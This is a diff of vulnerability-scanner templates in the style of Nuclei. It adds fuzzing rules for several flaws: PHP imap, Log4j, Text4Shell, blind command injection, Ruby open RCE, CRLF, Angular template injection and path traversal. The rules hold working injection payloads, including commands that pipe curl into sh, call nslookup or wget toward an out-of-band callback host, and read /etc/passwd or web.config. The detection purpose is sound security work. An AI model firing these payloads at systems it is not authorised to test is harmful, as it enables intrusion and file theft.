{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
|
||||
|
@ -2328,7 +2355,6 @@
|
|||
{"ID":"CVE-2018-2893","Info":{"Name":"Oracle WebLogic Server - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2018/CVE-2018-2893.yaml"}
|
||||
{"ID":"CVE-2020-11981","Info":{"Name":"Apache Airflow \u003c=1.10.10 - Command Injection","Severity":"critical","Description":"An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-11981.yaml"}
|
||||
{"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-1938.yaml"}
|
||||
{"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-7247.yaml"}
|
||||
{"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"network/cves/2021/CVE-2021-44521.yaml"}
|
||||
{"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The\nvulnerability was introduced by Debian and Ubuntu Redis packages that\ninsufficiently sanitized the Lua environment. The maintainers failed to\ndisable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"}
|
||||
{"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"}
|
||||
|
|
|
@ -1 +1 @@
|
|||
0718093f8377862f2723b488bb15e23a
|
||||
70ec4e132bf5f0a5c3a4325d6a647f3a
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2018-19518
|
||||
|
||||
info:
|
||||
name: PHP imap - Remote Command Execution
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: |
|
||||
University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-19518
|
||||
- https://www.openwall.com/lists/oss-security/2018/11/22/3
|
||||
- https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2018-19518
|
||||
cwe-id: CWE-88
|
||||
metadata:
|
||||
confidence: tenative
|
||||
tags: imap,dast,vulhub,cve,cve2018,rce,oast,php
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
php-imap:
|
||||
- "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
fuzz:
|
||||
- "{{php-imap}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- http
|
||||
|
||||
- type: word
|
||||
part: interactsh_request
|
||||
words:
|
||||
- "User-Agent: curl"
|
||||
# digest: 4a0a00473045022100af7a090c8826b8f7eb0934a5a130dc05780441afce33b5e31dda44213d47691e02205499f8bad4923cabbddd841491363890751a97b823905e848b6ed457c4d2ecab:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,62 @@
|
|||
id: CVE-2021-45046-DAST
|
||||
|
||||
info:
|
||||
name: Apache Log4j2 - Remote Code Injection
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
|
||||
- https://twitter.com/marcioalm/status/1471740771581652995
|
||||
- https://logging.apache.org/log4j/2.x/
|
||||
- http://www.openwall.com/lists/oss-security/2021/12/14/4
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 9
|
||||
cve-id: CVE-2021-45046
|
||||
cwe-id: CWE-502
|
||||
metadata:
|
||||
confidence: tenative
|
||||
tags: cve,cve2021,rce,oast,log4j,injection,dast
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
log4j:
|
||||
- "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
fuzz:
|
||||
- "{{log4j}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
group: 2
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
group: 1
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
||||
# digest: 4a0a00473045022036888452035d1bfa69cbc32805393a712fdcd5595224466cc327e681ba5ef5770221008096d4d19c6975ad5bd44b06d4bc1cdfd0746570cb65c17c50cf4eb2e8a7b10d:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2022-34265
|
||||
|
||||
info:
|
||||
name: Django - SQL injection
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: |
|
||||
An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-34265
|
||||
- https://www.djangoproject.com/weblog/2022/jul/04/security-releases/
|
||||
- https://docs.djangoproject.com/en/4.0/releases/security/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-34265
|
||||
cwe-id: CWE-89
|
||||
tags: sqli,dast,vulhub,cve,cve2022,django
|
||||
|
||||
variables:
|
||||
rand_string: '{{rand_text_alpha(15, "abc")}}'
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
fuzz:
|
||||
- "test'{{rand_string}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'syntax error at or near "{{rand_string}}"'
|
||||
- 'LINE 1: SELECT DATE_TRUNC'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
# digest: 4a0a00473045022100991d4f9cc916935beb1ad69688feda3753f72a2ab38d08917c1e133380434c010220783ace6ba00da5d1932b3362ce58cec8541b97e0058c709b6c99ff14f9cdaba8:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,68 @@
|
|||
id: CVE-2022-42889
|
||||
|
||||
info:
|
||||
name: Text4Shell - Remote Code Execution
|
||||
author: mordavid,princechaddha
|
||||
severity: critical
|
||||
description: |
|
||||
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
|
||||
reference:
|
||||
- https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om
|
||||
- http://www.openwall.com/lists/oss-security/2022/10/13/4
|
||||
- http://www.openwall.com/lists/oss-security/2022/10/18/1
|
||||
- https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/
|
||||
- https://github.com/silentsignal/burp-text4shell
|
||||
remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-42889
|
||||
cwe-id: CWE-94
|
||||
metadata:
|
||||
confidence: tenative
|
||||
tags: cve,cve2022,rce,oast,text4shell,dast
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
text4shell:
|
||||
- "${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
fuzz:
|
||||
- "{{text4shell}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
group: 2
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
group: 1
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
||||
# digest: 4a0a00473045022100adec8de25b518a2bc2dec461a62f19c384ddac2951bd98b9ec21df05061c84d9022013f544b276c203c4846921eddf8c0be1a997fd68f5d3c8b8ff71f02873788aed:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,48 @@
|
|||
id: cmdi-blind-oast-polyglot
|
||||
|
||||
info:
|
||||
name: Blind OS Command Injection
|
||||
author: pdteam,geeknik
|
||||
severity: high
|
||||
description: |
|
||||
Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input.
|
||||
Successful exploitation could lead to arbitrary command execution on the system.
|
||||
reference:
|
||||
- https://portswigger.net/research/hunting-asynchronous-vulnerabilities
|
||||
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md
|
||||
tags: cmdi,oast,dast,blind,polyglot
|
||||
|
||||
variables:
|
||||
marker: "{{interactsh-url}}"
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
payload:
|
||||
- "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'"
|
||||
- "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}"
|
||||
- "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/"
|
||||
- "$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: postfix
|
||||
fuzz:
|
||||
- "{{payload}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
# digest: 490a00463044022058dacdd25a0687edf873bcfed32eb383e77deb0e9ea9673e111501121429df2702202005d54354bf6a06cd873145dea3139f0b094a3baad9e7313fd9d65ef7b31876:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,38 @@
|
|||
id: cmdi-ruby-open-rce
|
||||
|
||||
info:
|
||||
name: Ruby Kernel#open/URI.open RCE
|
||||
author: pdteam
|
||||
severity: high
|
||||
description: |
|
||||
Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.
|
||||
reference:
|
||||
- https://bishopfox.com/blog/ruby-vulnerabilities-exploits
|
||||
- https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/
|
||||
tags: cmdi,oast,dast,blind,ruby,rce
|
||||
|
||||
variables:
|
||||
marker: "{{interactsh-url}}"
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
stop-at-first-match: true
|
||||
payloads:
|
||||
interaction:
|
||||
- "|nslookup {{marker}}|curl {{marker}}"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
fuzz:
|
||||
- "{{interaction}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
# digest: 490a0046304402206aa8aaaae832c775eb192a6fa98138271fa21bc2ac34b3881f0e06d24fb48f78022040513ba5b73cbfb5fe42c3a312ae9d8e76fb0d6f942ad7bcfe8dfff4f173d00c:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,36 @@
|
|||
id: cookie-injection
|
||||
|
||||
info:
|
||||
name: Parameter based cookie injection
|
||||
author: pdteam
|
||||
severity: info
|
||||
reference:
|
||||
- https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/
|
||||
- https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm
|
||||
tags: reflected,dast,cookie,injection
|
||||
|
||||
variables:
|
||||
first: "cookie_injection"
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
reflection:
|
||||
- "{{first}}"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: postfix
|
||||
fuzz:
|
||||
- "{{reflection}}"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)(?i)(^set-cookie.*cookie_injection.*)'
|
||||
# digest: 4a0a00473045022100af6e35a8b4c4d4533e339e81393faed157da2e68144557ca3fe73fb16178919c022073127c1b729ab0c8c273cbc022b2aca2b7a91a6c4c314633a20059e6b10e22ed:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,71 @@
|
|||
id: crlf-injection
|
||||
|
||||
info:
|
||||
name: CRLF Injection
|
||||
author: pdteam
|
||||
severity: low
|
||||
tags: crlf,dast
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
escape:
|
||||
- "%00"
|
||||
- "%0a"
|
||||
- "%0a%20"
|
||||
- "%0d"
|
||||
- "%0d%09"
|
||||
- "%0d%0a"
|
||||
- "%0d%0a%09"
|
||||
- "%0d%0a%20"
|
||||
- "%0d%20"
|
||||
- "%20"
|
||||
- "%20%0a"
|
||||
- "%20%0d"
|
||||
- "%20%0d%0a"
|
||||
- "%23%0a"
|
||||
- "%23%0a%20"
|
||||
- "%23%0d"
|
||||
- "%23%0d%0a"
|
||||
- "%23%oa"
|
||||
- "%25%30"
|
||||
- "%25%30%61"
|
||||
- "%2e%2e%2f%0d%0a"
|
||||
- "%2f%2e%2e%0d%0a"
|
||||
- "%2f..%0d%0a"
|
||||
- "%3f"
|
||||
- "%3f%0a"
|
||||
- "%3f%0d"
|
||||
- "%3f%0d%0a"
|
||||
- "%e5%98%8a%e5%98%8d"
|
||||
- "%e5%98%8a%e5%98%8d%0a"
|
||||
- "%e5%98%8a%e5%98%8d%0d"
|
||||
- "%e5%98%8a%e5%98%8d%0d%0a"
|
||||
- "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d"
|
||||
- "%u0000"
|
||||
- "%u000a"
|
||||
- "%u000d"
|
||||
- "\r"
|
||||
- "\r%20"
|
||||
- "\r\n"
|
||||
- "\r\n%20"
|
||||
- "\r\n\t"
|
||||
- "\r\t"
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: postfix
|
||||
fuzz:
|
||||
- "{{escape}}Set-Cookie:crlfinjection=crlfinjection"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
|
||||
# digest: 4b0a00483046022100cb88bef820fa9247bc7ddc126d8bb67c4d2371c0b4a33f64b4caa5360007f1750221009ea9e7de7dc5fe7e75cf9d215a9c2d9e3323f2caa40b7c4b39cf214f661cce48:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,47 @@
|
|||
id: angular-client-side-template-injection
|
||||
|
||||
info:
|
||||
name: Angular Client-side-template-injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Detects Angular client-side template injection vulnerability.
|
||||
impact: |
|
||||
May lead to remote code execution or sensitive data exposure.
|
||||
remediation: |
|
||||
Sanitize user inputs and avoid using user-controlled data in template rendering.
|
||||
reference:
|
||||
- https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/
|
||||
- https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs
|
||||
tags: angular,csti,dast,headless,xss
|
||||
|
||||
variables:
|
||||
first: "{{rand_int(1000, 9999)}}"
|
||||
second: "{{rand_int(1000, 9999)}}"
|
||||
result: "{{to_number(first)*to_number(second)}}"
|
||||
|
||||
headless:
|
||||
- steps:
|
||||
- action: navigate
|
||||
args:
|
||||
url: "{{BaseURL}}"
|
||||
|
||||
- action: waitload
|
||||
|
||||
payloads:
|
||||
payload:
|
||||
- '{{concat("{{", "{{first}}*{{second}}", "}}")}}'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
type: postfix
|
||||
mode: single
|
||||
fuzz:
|
||||
- "{{payload}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{{result}}"
|
||||
# digest: 4a0a00473045022100adfe788d650a997bddf7f4876f1308a9d1ea62d43e7b90abca139f455492d4e902203223d59aac1aa4374770127adface5ccebfd4a4dc8fdfef8b240578bf7b6df72:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,120 @@
|
|||
id: lfi-keyed
|
||||
|
||||
info:
|
||||
name: LFI Detection - Keyed
|
||||
author: pwnhxl
|
||||
severity: unknown
|
||||
reference:
|
||||
- https://owasp.org/www-community/attacks/Unicode_Encoding
|
||||
tags: dast,pathtraversal,lfi
|
||||
|
||||
variables:
|
||||
fuzz: "../../../../../../../../../../../../../../../"
|
||||
fuzz_urlx2_encode: "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f"
|
||||
fuzz_hex_unicode: "%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f"
|
||||
fuzz_utf8_unicode: "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF"
|
||||
fuzz_utf8_unicode_x: "%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF"
|
||||
fuzz_bypass_replace: ".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../"
|
||||
fuzz_bypass_replace_windows: '..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\'
|
||||
fuzz_bypass_waf_regx: "./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../"
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'method == "GET"'
|
||||
|
||||
payloads:
|
||||
pathtraversal:
|
||||
- '{{fuzz}}etc/passwd'
|
||||
- '{{fuzz}}windows/win.ini'
|
||||
- '/etc/passwd%00.jpg'
|
||||
- 'c:/windows/win.ini%00.jpg'
|
||||
- '{{fuzz}}etc/passwd%00.jpg'
|
||||
- '{{fuzz}}windows/win.ini%00.jpg'
|
||||
- '{{fuzz_urlx2_encode}}etc%252fpasswd'
|
||||
- '{{fuzz_urlx2_encode}}windows%252fwin.ini'
|
||||
- '{{fuzz_hex_unicode}}etc%u002fpasswd'
|
||||
- '{{fuzz_hex_unicode}}windows%u002fwin.ini'
|
||||
- '{{fuzz_utf8_unicode}}etc%C0%AFpasswd'
|
||||
- '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini'
|
||||
- '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd'
|
||||
- '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini'
|
||||
- '{{fuzz_bypass_replace}}etc/passwd'
|
||||
- '{{fuzz_bypass_replace}}windows/win.ini'
|
||||
- '{{fuzz_bypass_replace_windows}}windows\win.ini'
|
||||
- '{{fuzz_bypass_waf_regx}}etc/passwd'
|
||||
- '{{fuzz_bypass_waf_regx}}windows/win.ini'
|
||||
- './web.config'
|
||||
- '../web.config'
|
||||
- '../../web.config'
|
||||
- './WEB-INF/web.xml'
|
||||
- '../WEB-INF/web.xml'
|
||||
- '../../WEB-INF/web.xml'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
mode: single
|
||||
keys:
|
||||
- cat
|
||||
- dir
|
||||
- action
|
||||
- board
|
||||
- date
|
||||
- detail
|
||||
- file
|
||||
- download
|
||||
- path
|
||||
- folder
|
||||
- prefix
|
||||
- include
|
||||
- page
|
||||
- inc
|
||||
- locate
|
||||
- show
|
||||
- doc
|
||||
- site
|
||||
- type
|
||||
- view
|
||||
- content
|
||||
- document
|
||||
- layout
|
||||
- mod
|
||||
- conf
|
||||
- url
|
||||
- img
|
||||
- image
|
||||
- images
|
||||
fuzz:
|
||||
- "{{pathtraversal}}"
|
||||
|
||||
- part: query
|
||||
mode: single
|
||||
values:
|
||||
- "^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$"
|
||||
fuzz:
|
||||
- "{{pathtraversal}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- 'root:.*?:[0-9]*:[0-9]*:'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'for 16-bit app support'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '(<web-app[\s\S]+<\/web-app>)'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '(<system.webServer[\s\S]+<\/system.webServer>)'
|
||||
# digest: 4b0a004830460221008cfcfdf2c3bffd887bfe964b433efe76af72df0f94ecea20ec1917cd00641c0f022100874e6ff747dbd4fa96124d034a126534558b56a7c317b32525e3d08199409065:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,80 @@
|
|||
id: linux-lfi-fuzz
|
||||
|
||||
info:
|
||||
name: Local File Inclusion - Linux
|
||||
author: DhiyaneshDK
|
||||
severity: high
|
||||
reference:
|
||||
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt
|
||||
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
|
||||
tags: lfi,dast,linux
|
||||
|
||||
http:
|
||||
- pre-condition:
|
||||
- type: dsl
|
||||
dsl:
|
||||
